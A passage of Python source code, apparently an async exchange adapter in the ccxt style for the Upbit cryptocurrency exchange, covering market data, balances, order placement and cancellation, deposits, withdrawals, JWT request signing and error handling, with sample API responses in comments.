'min': self.safe_float(ask, 'min_total'),
'max': None,
},
'price': {
'min': math.pow(10, -precision['price']),
'max': None,
},
'cost': {
'min': self.safe_float(bid, 'min_total'),
'max': self.safe_float(marketInfo, 'max_total'),
},
},
}
async def fetch_markets(self, params={}):
response = await self.publicGetMarketAll(params)
#
# [{ market: "KRW-BTC",
# korean_name: "비트코인",
# english_name: "Bitcoin" },
# { market: "KRW-DASH",
# korean_name: "대시",
# english_name: "Dash" },
# { market: "KRW-ETH",
# korean_name: "이더리움",
# english_name: "Ethereum"},
# { market: "BTC-ETH",
# korean_name: "이더리움",
# english_name: "Ethereum"},
# ...,
# { market: "BTC-BSV",
# korean_name: "비트코인에스브이",
# english_name: "Bitcoin SV"}]
#
result = []
for i in range(0, len(response)):
market = response[i]
id = self.safe_string(market, 'market')
quoteId, baseId = id.split('-')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
precision = {
'amount': 8,
'price': 8,
}
active = True
makerFee = self.safe_float(self.options['tradingFeesByQuoteCurrency'], quote, self.fees['trading']['maker'])
takerFee = self.safe_float(self.options['tradingFeesByQuoteCurrency'], quote, self.fees['trading']['taker'])
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': active,
'info': market,
'precision': precision,
'maker': makerFee,
'taker': takerFee,
'limits': {
'amount': {
'min': math.pow(10, -precision['amount']),
'max': None,
},
'price': {
'min': math.pow(10, -precision['price']),
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
})
return result
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.privateGetAccounts(params)
#
# [{ currency: "BTC",
# balance: "0.005",
# locked: "0.0",
# avg_krw_buy_price: "7446000",
# modified: False },
# { currency: "ETH",
# balance: "0.1",
# locked: "0.0",
# avg_krw_buy_price: "250000",
# modified: False } ]
#
result = {'info': response}
for i in range(0, len(response)):
balance = response[i]
currencyId = self.safe_string(balance, 'currency')
code = self.safe_currency_code(currencyId)
account = self.account()
account['free'] = self.safe_float(balance, 'balance')
account['used'] = self.safe_float(balance, 'locked')
result[code] = account
return self.parse_balance(result)
def get_symbol_from_market_id(self, marketId, market=None):
if marketId is None:
return None
market = self.safe_value(self.markets_by_id, marketId, market)
if market is not None:
return market['symbol']
baseId, quoteId = marketId.split(self.options['symbolSeparator'])
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
return base + '/' + quote
async def fetch_order_books(self, symbols=None, params={}):
await self.load_markets()
ids = None
if symbols is None:
ids = ','.join(self.ids)
# max URL length is 2083 symbols, including http schema, hostname, tld, etc...
if len(ids) > self.options['fetchOrderBooksMaxLength']:
numIds = len(self.ids)
raise ExchangeError(self.id + ' has ' + str(numIds) + ' symbols(' + str(len(ids)) + ' characters) exceeding max URL length(' + str(self.options['fetchOrderBooksMaxLength']) + ' characters), you are required to specify a list of symbols in the first argument to fetchOrderBooks')
else:
ids = self.market_ids(symbols)
ids = ','.join(ids)
request = {
'markets': ids,
}
response = await self.publicGetOrderbook(self.extend(request, params))
#
# [{ market: "BTC-ETH",
# timestamp: 1542899030043,
# total_ask_size: 109.57065201,
# total_bid_size: 125.74430631,
# orderbook_units: [{ask_price: 0.02926679,
# bid_price: 0.02919904,
# ask_size: 4.20293961,
# bid_size: 11.65043576},
# ...,
# {ask_price: 0.02938209,
# bid_price: 0.0291231,
# ask_size: 0.05135782,
# bid_size: 13.5595 } ]},
# { market: "KRW-BTC",
# timestamp: 1542899034662,
# total_ask_size: 12.89790974,
# total_bid_size: 4.88395783,
# orderbook_units: [{ask_price: 5164000,
# bid_price: 5162000,
# ask_size: 2.57606495,
# bid_size: 0.214 },
# ...,
# {ask_price: 5176000,
# bid_price: 5152000,
# ask_size: 2.752,
# bid_size: 0.4650305} ]} ]
#
result = {}
for i in range(0, len(response)):
orderbook = response[i]
symbol = self.get_symbol_from_market_id(self.safe_string(orderbook, 'market'))
timestamp = self.safe_integer(orderbook, 'timestamp')
result[symbol] = {
'bids': self.sort_by(self.parse_bids_asks(orderbook['orderbook_units'], 'bid_price', 'bid_size'), 0, True),
'asks': self.sort_by(self.parse_bids_asks(orderbook['orderbook_units'], 'ask_price', 'ask_size'), 0),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'nonce': None,
}
return result
async def fetch_order_book(self, symbol, limit=None, params={}):
orderbooks = await self.fetch_order_books([symbol], params)
return self.safe_value(orderbooks, symbol)
def parse_ticker(self, ticker, market=None):
#
# { market: "BTC-ETH",
# trade_date: "20181122",
# trade_time: "104543",
# trade_date_kst: "20181122",
# trade_time_kst: "194543",
# trade_timestamp: 1542883543097,
# opening_price: 0.02976455,
# high_price: 0.02992577,
# low_price: 0.02934283,
# trade_price: 0.02947773,
# prev_closing_price: 0.02966,
# change: "FALL",
# change_price: 0.00018227,
# change_rate: 0.0061453136,
# signed_change_price: -0.00018227,
# signed_change_rate: -0.0061453136,
# trade_volume: 1.00000005,
# acc_trade_price: 100.95825586,
# acc_trade_price_24h: 289.58650166,
# acc_trade_volume: 3409.85311036,
# acc_trade_volume_24h: 9754.40510513,
# highest_52_week_price: 0.12345678,
# highest_52_week_date: "2018-02-01",
# lowest_52_week_price: 0.023936,
# lowest_52_week_date: "2017-12-08",
# timestamp: 1542883543813 }
#
timestamp = self.safe_integer(ticker, 'trade_timestamp')
symbol = self.get_symbol_from_market_id(self.safe_string(ticker, 'market'), market)
previous = self.safe_float(ticker, 'prev_closing_price')
last = self.safe_float(ticker, 'trade_price')
change = self.safe_float(ticker, 'signed_change_price')
percentage = self.safe_float(ticker, 'signed_change_rate')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high_price'),
'low': self.safe_float(ticker, 'low_price'),
'bid': None,
'bidVolume': None,
'ask': None,
'askVolume': None,
'vwap': None,
'open': self.safe_float(ticker, 'opening_price'),
'close': last,
'last': last,
'previousClose': previous,
'change': change,
'percentage': percentage,
'average': None,
'baseVolume': self.safe_float(ticker, 'acc_trade_volume_24h'),
'quoteVolume': self.safe_float(ticker, 'acc_trade_price_24h'),
'info': ticker,
}
async def fetch_tickers(self, symbols=None, params={}):
await self.load_markets()
ids = None
if symbols is None:
ids = ','.join(self.ids)
# max URL length is 2083 symbols, including http schema, hostname, tld, etc...
if len(ids) > self.options['fetchTickersMaxLength']:
numIds = len(self.ids)
raise ExchangeError(self.id + ' has ' + str(numIds) + ' symbols exceeding max URL length, you are required to specify a list of symbols in the first argument to fetchTickers')
else:
ids = self.market_ids(symbols)
ids = ','.join(ids)
request = {
'markets': ids,
}
response = await self.publicGetTicker(self.extend(request, params))
#
# [{ market: "BTC-ETH",
# trade_date: "20181122",
# trade_time: "104543",
# trade_date_kst: "20181122",
# trade_time_kst: "194543",
# trade_timestamp: 1542883543097,
# opening_price: 0.02976455,
# high_price: 0.02992577,
# low_price: 0.02934283,
# trade_price: 0.02947773,
# prev_closing_price: 0.02966,
# change: "FALL",
# change_price: 0.00018227,
# change_rate: 0.0061453136,
# signed_change_price: -0.00018227,
# signed_change_rate: -0.0061453136,
# trade_volume: 1.00000005,
# acc_trade_price: 100.95825586,
# acc_trade_price_24h: 289.58650166,
# acc_trade_volume: 3409.85311036,
# acc_trade_volume_24h: 9754.40510513,
# highest_52_week_price: 0.12345678,
# highest_52_week_date: "2018-02-01",
# lowest_52_week_price: 0.023936,
# lowest_52_week_date: "2017-12-08",
# timestamp: 1542883543813 }]
#
result = {}
for t in range(0, len(response)):
ticker = self.parse_ticker(response[t])
symbol = ticker['symbol']
result[symbol] = ticker
return result
async def fetch_ticker(self, symbol, params={}):
tickers = await self.fetch_tickers([symbol], params)
return self.safe_value(tickers, symbol)
def parse_trade(self, trade, market=None):
#
# fetchTrades
#
# { market: "BTC-ETH",
# trade_date_utc: "2018-11-22",
# trade_time_utc: "13:55:24",
# timestamp: 1542894924397,
# trade_price: 0.02914289,
# trade_volume: 0.20074397,
# prev_closing_price: 0.02966,
# change_price: -0.00051711,
# ask_bid: "ASK",
# sequential_id: 15428949259430000}
#
# fetchOrder trades
#
# {
# "market": "KRW-BTC",
# "uuid": "78162304-1a4d-4524-b9e6-c9a9e14d76c3",
# "price": "101000.0",
# "volume": "0.77368323",
# "funds": "78142.00623",
# "ask_fee": "117.213009345",
# "bid_fee": "117.213009345",
# "created_at": "2018-04-05T14:09:15+09:00",
# "side": "bid",
# }
#
id = self.safe_string_2(trade, 'sequential_id', 'uuid')
orderId = None
timestamp = self.safe_integer(trade, 'timestamp')
if timestamp is None:
timestamp = self.parse8601(self.safe_string(trade, 'created_at'))
side = None
askOrBid = self.safe_string_lower_2(trade, 'ask_bid', 'side')
if askOrBid == 'ask':
side = 'sell'
elif askOrBid == 'bid':
side = 'buy'
cost = self.safe_float(trade, 'funds')
price = self.safe_float_2(trade, 'trade_price', 'price')
amount = self.safe_float_2(trade, 'trade_volume', 'volume')
if cost is None:
if amount is not None:
if price is not None:
cost = price * amount
marketId = self.safe_string(trade, 'market')
market = self.safe_value(self.markets_by_id, marketId)
fee = None
feeCurrency = None
symbol = None
if market is not None:
symbol = market['symbol']
feeCurrency = market['quote']
else:
baseId, quoteId = marketId.split('-')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
feeCurrency = quote
feeCost = self.safe_string(trade, askOrBid + '_fee')
if feeCost is not None:
fee = {
'currency': feeCurrency,
'cost': feeCost,
}
return {
'id': id,
'info': trade,
'order': orderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'type': 'limit',
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': fee,
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
if limit is None:
limit = 200
request = {
'market': market['id'],
'count': limit,
}
response = await self.publicGetTradesTicks(self.extend(request, params))
#
# [{ market: "BTC-ETH",
# trade_date_utc: "2018-11-22",
# trade_time_utc: "13:55:24",
# timestamp: 1542894924397,
# trade_price: 0.02914289,
# trade_volume: 0.20074397,
# prev_closing_price: 0.02966,
# change_price: -0.00051711,
# ask_bid: "ASK",
# sequential_id: 15428949259430000},
# { market: "BTC-ETH",
# trade_date_utc: "2018-11-22",
# trade_time_utc: "13:03:10",
# timestamp: 1542891790123,
# trade_price: 0.02917,
# trade_volume: 7.392,
# prev_closing_price: 0.02966,
# change_price: -0.00049,
# ask_bid: "ASK",
# sequential_id: 15428917910540000} ]
#
return self.parse_trades(response, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None, timeframe='1d', since=None, limit=None):
#
# { market: "BTC-ETH",
# candle_date_time_utc: "2018-11-22T13:47:00",
# candle_date_time_kst: "2018-11-22T22:47:00",
# opening_price: 0.02915963,
# high_price: 0.02915963,
# low_price: 0.02915448,
# trade_price: 0.02915448,
# timestamp: 1542894473674,
# candle_acc_trade_price: 0.0981629437535248,
# candle_acc_trade_volume: 3.36693173,
# unit: 1 },
#
return [
self.parse8601(self.safe_string(ohlcv, 'candle_date_time_utc')),
self.safe_float(ohlcv, 'opening_price'),
self.safe_float(ohlcv, 'high_price'),
self.safe_float(ohlcv, 'low_price'),
self.safe_float(ohlcv, 'trade_price'),
self.safe_float(ohlcv, 'candle_acc_trade_volume'), # base volume
]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
timeframePeriod = self.parse_timeframe(timeframe)
timeframeValue = self.timeframes[timeframe]
if limit is None:
limit = 200
request = {
'market': market['id'],
'timeframe': timeframeValue,
'count': limit,
}
method = 'publicGetCandlesTimeframe'
if timeframeValue == 'minutes':
numMinutes = int(round(timeframePeriod / 60))
request['unit'] = numMinutes
method += 'Unit'
if since is not None:
# convert `since` to `to` value
request['to'] = self.iso8601(self.sum(since, timeframePeriod * limit * 1000))
response = await getattr(self, method)(self.extend(request, params))
#
# [{ market: "BTC-ETH",
# candle_date_time_utc: "2018-11-22T13:47:00",
# candle_date_time_kst: "2018-11-22T22:47:00",
# opening_price: 0.02915963,
# high_price: 0.02915963,
# low_price: 0.02915448,
# trade_price: 0.02915448,
# timestamp: 1542894473674,
# candle_acc_trade_price: 0.0981629437535248,
# candle_acc_trade_volume: 3.36693173,
# unit: 1 },
# { market: "BTC-ETH",
# candle_date_time_utc: "2018-11-22T10:06:00",
# candle_date_time_kst: "2018-11-22T19:06:00",
# opening_price: 0.0294,
# high_price: 0.02940882,
# low_price: 0.02934283,
# trade_price: 0.02937354,
# timestamp: 1542881219276,
# candle_acc_trade_price: 0.0762597110943884,
# candle_acc_trade_volume: 2.5949617,
# unit: 1 } ]
#
return self.parse_ohlcvs(response, market, timeframe, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
if type == 'market':
# for market buy it requires the amount of quote currency to spend
if side == 'buy':
if self.options['createMarketBuyOrderRequiresPrice']:
if price is None:
raise InvalidOrder(self.id + " createOrder() requires the price argument with market buy orders to calculate total order cost(amount to spend), where cost = amount * price. Supply a price argument to createOrder() call if you want the cost to be calculated for you from price and amount, or, alternatively, add .options['createMarketBuyOrderRequiresPrice'] = False to supply the cost in the amount argument(the exchange-specific behaviour)")
else:
amount = amount * price
orderSide = None
if side == 'buy':
orderSide = 'bid'
elif side == 'sell':
orderSide = 'ask'
else:
raise InvalidOrder(self.id + ' createOrder allows buy or sell side onlynot ')
await self.load_markets()
market = self.market(symbol)
request = {
'market': market['id'],
'side': orderSide,
}
if type == 'limit':
request['volume'] = self.amount_to_precision(symbol, amount)
request['price'] = self.price_to_precision(symbol, price)
request['ord_type'] = type
elif type == 'market':
if side == 'buy':
request['ord_type'] = 'price'
request['price'] = self.price_to_precision(symbol, amount)
elif side == 'sell':
request['ord_type'] = type
request['volume'] = self.amount_to_precision(symbol, amount)
response = await self.privatePostOrders(self.extend(request, params))
#
# {
# 'uuid': 'cdd92199-2897-4e14-9448-f923320408ad',
# 'side': 'bid',
# 'ord_type': 'limit',
# 'price': '100.0',
# 'avg_price': '0.0',
# 'state': 'wait',
# 'market': 'KRW-BTC',
# 'created_at': '2018-04-10T15:42:23+09:00',
# 'volume': '0.01',
# 'remaining_volume': '0.01',
# 'reserved_fee': '0.0015',
# 'remaining_fee': '0.0015',
# 'paid_fee': '0.0',
# 'locked': '1.0015',
# 'executed_volume': '0.0',
# 'trades_count': 0
# }
#
return self.parse_order(response)
async def cancel_order(self, id, symbol=None, params={}):
await self.load_markets()
request = {
'uuid': id,
}
response = await self.privateDeleteOrder(self.extend(request, params))
#
# {
# "uuid": "cdd92199-2897-4e14-9448-f923320408ad",
# "side": "bid",
# "ord_type": "limit",
# "price": "100.0",
# "state": "wait",
# "market": "KRW-BTC",
# "created_at": "2018-04-10T15:42:23+09:00",
# "volume": "0.01",
# "remaining_volume": "0.01",
# "reserved_fee": "0.0015",
# "remaining_fee": "0.0015",
# "paid_fee": "0.0",
# "locked": "1.0015",
# "executed_volume": "0.0",
# "trades_count": 0
# }
#
return self.parse_order(response)
async def fetch_deposits(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {
# 'page': 1,
# 'order_by': 'asc', # 'desc'
}
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['limit'] = limit # default is 100
response = await self.privateGetDeposits(self.extend(request, params))
#
# [
# {
# "type": "deposit",
# "uuid": "94332e99-3a87-4a35-ad98-28b0c969f830",
# "currency": "KRW",
# "txid": "9e37c537-6849-4c8b-a134-57313f5dfc5a",
# "state": "ACCEPTED",
# "created_at": "2017-12-08T15:38:02+09:00",
# "done_at": "2017-12-08T15:38:02+09:00",
# "amount": "100000.0",
# "fee": "0.0"
# },
# ...,
# ]
#
return self.parse_transactions(response, currency, since, limit)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {
# 'state': 'submitting', # 'submitted', 'almost_accepted', 'rejected', 'accepted', 'processing', 'done', 'canceled'
}
currency = None
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
if limit is not None:
request['limit'] = limit # default is 100
response = await self.privateGetWithdraws(self.extend(request, params))
#
# [
# {
# "type": "withdraw",
# "uuid": "9f432943-54e0-40b7-825f-b6fec8b42b79",
# "currency": "BTC",
# "txid": null,
# "state": "processing",
# "created_at": "2018-04-13T11:24:01+09:00",
# "done_at": null,
# "amount": "0.01",
# "fee": "0.0",
# "krw_amount": "80420.0"
# },
# ...,
# ]
#
return self.parse_transactions(response, currency, since, limit)
def parse_transaction_status(self, status):
statuses = {
'ACCEPTED': 'ok', # deposits
# withdrawals:
'submitting': 'pending', # 처리 중
'submitted': 'pending', # 처리 완료
'almost_accepted': 'pending', # 출금대기중
'rejected': 'failed', # 거부
'accepted': 'pending', # 승인됨
'processing': 'pending', # 처리 중
'done': 'ok', # 완료
'canceled': 'canceled', # 취소됨
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# fetchDeposits
#
# {
# "type": "deposit",
# "uuid": "94332e99-3a87-4a35-ad98-28b0c969f830",
# "currency": "KRW",
# "txid": "9e37c537-6849-4c8b-a134-57313f5dfc5a",
# "state": "ACCEPTED",
# "created_at": "2017-12-08T15:38:02+09:00",
# "done_at": "2017-12-08T15:38:02+09:00",
# "amount": "100000.0",
# "fee": "0.0"
# }
#
# fetchWithdrawals
#
# {
# "type": "withdraw",
# "uuid": "9f432943-54e0-40b7-825f-b6fec8b42b79",
# "currency": "BTC",
# "txid": "cd81e9b45df8da29f936836e58c907a106057e454a45767a7b06fcb19b966bba",
# "state": "processing",
# "created_at": "2018-04-13T11:24:01+09:00",
# "done_at": null,
# "amount": "0.01",
# "fee": "0.0",
# "krw_amount": "80420.0"
# }
#
id = self.safe_string(transaction, 'uuid')
amount = self.safe_float(transaction, 'amount')
address = None # not present in the data structure received from the exchange
tag = None # not present in the data structure received from the exchange
txid = self.safe_string(transaction, 'txid')
updated = self.parse8601(self.safe_string(transaction, 'done_at'))
timestamp = self.parse8601(self.safe_string(transaction, 'created_at', updated))
type = self.safe_string(transaction, 'type')
if type == 'withdraw':
type = 'withdrawal'
currencyId = self.safe_string(transaction, 'currency')
code = self.safe_currency_code(currencyId)
status = self.parse_transaction_status(self.safe_string(transaction, 'state'))
feeCost = self.safe_float(transaction, 'fee')
return {
'info': transaction,
'id': id,
'currency': code,
'amount': amount,
'address': address,
'tag': tag,
'status': status,
'type': type,
'updated': updated,
'txid': txid,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': {
'currency': code,
'cost': feeCost,
},
}
def parse_order_status(self, status):
statuses = {
'wait': 'open',
'done': 'closed',
'cancel': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# {
# "uuid": "a08f09b1-1718-42e2-9358-f0e5e083d3ee",
# "side": "bid",
# "ord_type": "limit",
# "price": "17417000.0",
# "state": "done",
# "market": "KRW-BTC",
# "created_at": "2018-04-05T14:09:14+09:00",
# "volume": "1.0",
# "remaining_volume": "0.0",
# "reserved_fee": "26125.5",
# "remaining_fee": "25974.0",
# "paid_fee": "151.5",
# "locked": "17341974.0",
# "executed_volume": "1.0",
# "trades_count": 2,
# "trades": [
# {
# "market": "KRW-BTC",
# "uuid": "78162304-1a4d-4524-b9e6-c9a9e14d76c3",
# "price": "101000.0",
# "volume": "0.77368323",
# "funds": "78142.00623",
# "ask_fee": "117.213009345",
# "bid_fee": "117.213009345",
# "created_at": "2018-04-05T14:09:15+09:00",
# "side": "bid",
# },
# {
# "market": "KRW-BTC",
# "uuid": "f73da467-c42f-407d-92fa-e10d86450a20",
# "price": "101000.0",
# "volume": "0.22631677",
# "funds": "22857.99377",
# "ask_fee": "34.286990655", # missing in market orders
# "bid_fee": "34.286990655", # missing in market orders
# "created_at": "2018-04-05T14:09:15+09:00", # missing in market orders
# "side": "bid",
# },
# ],
# }
#
id = self.safe_string(order, 'uuid')
side = self.safe_string(order, 'side')
if side == 'bid':
side = 'buy'
else:
side = 'sell'
type = self.safe_string(order, 'ord_type')
timestamp = self.parse8601(self.safe_string(order, 'created_at'))
status = self.parse_order_status(self.safe_string(order, 'state'))
lastTradeTimestamp = None
price = self.safe_float(order, 'price')
amount = self.safe_float(order, 'volume')
remaining = self.safe_float(order, 'remaining_volume')
filled = self.safe_float(order, 'executed_volume')
cost = None
if type == 'price':
type = 'market'
cost = price
price = None
average = None
fee = None
feeCost = self.safe_float(order, 'paid_fee')
feeCurrency = None
marketId = self.safe_string(order, 'market')
market = self.safe_value(self.markets_by_id, marketId)
symbol = None
if market is not None:
symbol = market['symbol']
feeCurrency = market['quote']
else:
baseId, quoteId = marketId.split('-')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
feeCurrency = quote
trades = self.safe_value(order, 'trades', [])
trades = self.parse_trades(trades, market, None, None, {'order': id})
numTrades = len(trades)
if numTrades > 0:
# the timestamp in fetchOrder trades is missing
lastTradeTimestamp = trades[numTrades - 1]['timestamp']
getFeesFromTrades = False
if feeCost is None:
getFeesFromTrades = True
feeCost = 0
cost = 0
for i in range(0, numTrades):
trade = trades[i]
cost = self.sum(cost, trade['cost'])
if getFeesFromTrades:
tradeFee = self.safe_value(trades[i], 'fee', {})
tradeFeeCost = self.safe_float(tradeFee, 'cost')
if tradeFeeCost is not None:
feeCost = self.sum(feeCost, tradeFeeCost)
average = cost / filled
if feeCost is not None:
fee = {
'currency': feeCurrency,
'cost': feeCost,
}
result = {
'info': order,
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'symbol': symbol,
'type': type,
'side': side,
'price': price,
'cost': cost,
'average': average,
'amount': amount,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': fee,
'trades': trades,
}
return result
async def fetch_orders_by_state(self, state, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
request = {
# 'market': self.market_id(symbol),
'state': state,
# 'page': 1,
# 'order_by': 'asc',
}
market = None
if symbol is not None:
market = self.market(symbol)
request['market'] = market['id']
response = await self.privateGetOrders(self.extend(request, params))
#
# [
# {
# "uuid": "a08f09b1-1718-42e2-9358-f0e5e083d3ee",
# "side": "bid",
# "ord_type": "limit",
# "price": "17417000.0",
# "state": "done",
# "market": "KRW-BTC",
# "created_at": "2018-04-05T14:09:14+09:00",
# "volume": "1.0",
# "remaining_volume": "0.0",
# "reserved_fee": "26125.5",
# "remaining_fee": "25974.0",
# "paid_fee": "151.5",
# "locked": "17341974.0",
# "executed_volume": "1.0",
# "trades_count":2
# },
# ]
#
return self.parse_orders(response, market, since, limit)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_by_state('wait', symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_by_state('done', symbol, since, limit, params)
async def fetch_canceled_orders(self, symbol=None, since=None, limit=None, params={}):
return await self.fetch_orders_by_state('cancel', symbol, since, limit, params)
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
request = {
'uuid': id,
}
response = await self.privateGetOrder(self.extend(request, params))
#
# {
# "uuid": "a08f09b1-1718-42e2-9358-f0e5e083d3ee",
# "side": "bid",
# "ord_type": "limit",
# "price": "17417000.0",
# "state": "done",
# "market": "KRW-BTC",
# "created_at": "2018-04-05T14:09:14+09:00",
# "volume": "1.0",
# "remaining_volume": "0.0",
# "reserved_fee": "26125.5",
# "remaining_fee": "25974.0",
# "paid_fee": "151.5",
# "locked": "17341974.0",
# "executed_volume": "1.0",
# "trades_count": 2,
# "trades": [
# {
# "market": "KRW-BTC",
# "uuid": "78162304-1a4d-4524-b9e6-c9a9e14d76c3",
# "price": "101000.0",
# "volume": "0.77368323",
# "funds": "78142.00623",
# "ask_fee": "117.213009345",
# "bid_fee": "117.213009345",
# "created_at": "2018-04-05T14:09:15+09:00",
# "side": "bid"
# },
# {
# "market": "KRW-BTC",
# "uuid": "f73da467-c42f-407d-92fa-e10d86450a20",
# "price": "101000.0",
# "volume": "0.22631677",
# "funds": "22857.99377",
# "ask_fee": "34.286990655",
# "bid_fee": "34.286990655",
# "created_at": "2018-04-05T14:09:15+09:00",
# "side": "bid"
# }
# ]
# }
#
return self.parse_order(response)
def parse_deposit_addresses(self, addresses):
result = []
for i in range(0, len(addresses)):
result.append(self.parse_deposit_address(addresses[i]))
return result
async def fetch_deposit_addresses(self, codes=None, params={}):
await self.load_markets()
response = await self.privateGetDepositsCoinAddresses(params)
#
# [
# {
# "currency": "BTC",
# "deposit_address": "3EusRwybuZUhVDeHL7gh3HSLmbhLcy7NqD",
# "secondary_address": null
# },
# {
# "currency": "ETH",
# "deposit_address": "0x0d73e0a482b8cf568976d2e8688f4a899d29301c",
# "secondary_address": null
# },
# {
# "currency": "XRP",
# "deposit_address": "rN9qNpgnBaZwqCg8CvUZRPqCcPPY7wfWep",
# "secondary_address": "3057887915"
# }
# ]
#
return self.parse_deposit_addresses(response)
def parse_deposit_address(self, depositAddress, currency=None):
#
# {
# "currency": "BTC",
# "deposit_address": "3EusRwybuZUhVDeHL7gh3HSLmbhLcy7NqD",
# "secondary_address": null
# }
#
address = self.safe_string(depositAddress, 'deposit_address')
tag = self.safe_string(depositAddress, 'secondary_address')
currencyId = self.safe_string(depositAddress, 'currency')
code = self.safe_currency_code(currencyId)
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'info': depositAddress,
}
async def fetch_deposit_address(self, code, params={}):
await self.load_markets()
currency = self.currency(code)
response = await self.privateGetDepositsCoinAddress(self.extend({
'currency': currency['id'],
}, params))
#
# {
# "currency": "BTC",
# "deposit_address": "3EusRwybuZUhVDeHL7gh3HSLmbhLcy7NqD",
# "secondary_address": null
# }
#
return self.parse_deposit_address(response)
async def create_deposit_address(self, code, params={}):
await self.load_markets()
currency = self.currency(code)
request = {
'currency': currency['id'],
}
response = await self.fetch_deposit_address(code, self.extend(request, params))
#
# https://docs.upbit.com/v1.0/reference#%EC%9E%85%EA%B8%88-%EC%A3%BC%EC%86%8C-%EC%83%9D%EC%84%B1-%EC%9A%94%EC%B2%AD
# can be any of the two responses:
#
# {
# "success" : True,
# "message" : "Creating BTC deposit address."
# }
#
# {
# "currency": "BTC",
# "deposit_address": "3EusRwybuZUhVDeHL7gh3HSLmbhLcy7NqD",
# "secondary_address": null
# }
#
message = self.safe_string(response, 'message')
if message is not None:
return {
'currency': code,
'address': None,
'tag': None,
'info': response,
}
return self.parse_deposit_address(response)
async def withdraw(self, code, amount, address, tag=None, params={}):
self.check_address(address)
await self.load_markets()
currency = self.currency(code)
request = {
'amount': amount,
}
method = 'privatePostWithdraws'
if code != 'KRW':
method += 'Coin'
request['currency'] = currency['id']
request['address'] = address
if tag is not None:
request['secondary_address'] = tag
else:
method += 'Krw'
response = await getattr(self, method)(self.extend(request, params))
#
# {
# "type": "withdraw",
# "uuid": "9f432943-54e0-40b7-825f-b6fec8b42b79",
# "currency": "BTC",
# "txid": "ebe6937b-130e-4066-8ac6-4b0e67f28adc",
# "state": "processing",
# "created_at": "2018-04-13T11:24:01+09:00",
# "done_at": null,
# "amount": "0.01",
# "fee": "0.0",
# "krw_amount": "80420.0"
# }
#
return self.parse_transaction(response)
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.implode_params(self.urls['api'], {
'hostname': self.hostname,
})
url += '/' + self.version + '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if method == 'GET':
if query:
url += '?' + self.urlencode(query)
if api == 'private':
self.check_required_credentials()
nonce = self.nonce()
request = {
'access_key': self.apiKey,
'nonce': nonce,
}
if query:
request['query'] = self.urlencode(query)
jwt = self.jwt(request, self.encode(self.secret))
headers = {
'Authorization': 'Bearer ' + jwt,
}
if method != 'GET':
body = self.json(params)
headers['Content-Type'] = 'application/json'
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return # fallback to default error handler
#
# {'error': {'message': "Missing request parameter error. Check the required parametersnot ", 'name': 400} },
# {'error': {'message': "side is missing, side does not have a valid value", 'name': "validation_error"} },
# {'error': {'message': "개인정보 제 3자 제공 동의가 필요합니다.", 'name': "thirdparty_agreement_required"} },
# {'error': {'message': "권한이 부족합니다.", 'name': "out_of_scope"} },
# {'error': {'message': "주문을 찾지 못했습니다.", 'name': "order_not_found"} },
# {'error': {'message': "주문가능한 금액(ETH)이 부족합니다.", 'name': "insufficient_funds_ask"} },
# {'error': {'message': "주문가능한 금액(BTC)이 부족합니다.", 'name': "insufficient_funds_bid"} },
# {'error': {'message': "잘못된 엑세스 키입니다.", 'name': "invalid_access_key"} },
# {'error': {'message': "Jwt 토큰 검증에 실패했습니다.", 'name': "jwt_verification"} }
#
error = self.safe_value(response, 'error')
if error is not None:
message = self.safe_string(error, 'message')
name = self.safe_string(error, 'name')
feedback = self.id + ' ' + self.json(response)
exact = self.exceptions['exact']
if message in exact:
raise exact[message](feedback)
if name in exact:
raise exact[name](feedback)
broad = self.exceptions['broad']
broadKey = self.findBroadlyMatchedKey(broad, message)
if broadKey is not None:
raise broad[broadKey](feedback)
broadKey = self.findBroadlyMatchedKey(broad, name)
if broadKey is not None:
raise broad[broadKey](feedback)
raise ExchangeError(feedback) # unknown message
| [
"ruiliang.guo@homiex.com"
] | ruiliang.guo@homiex.com |
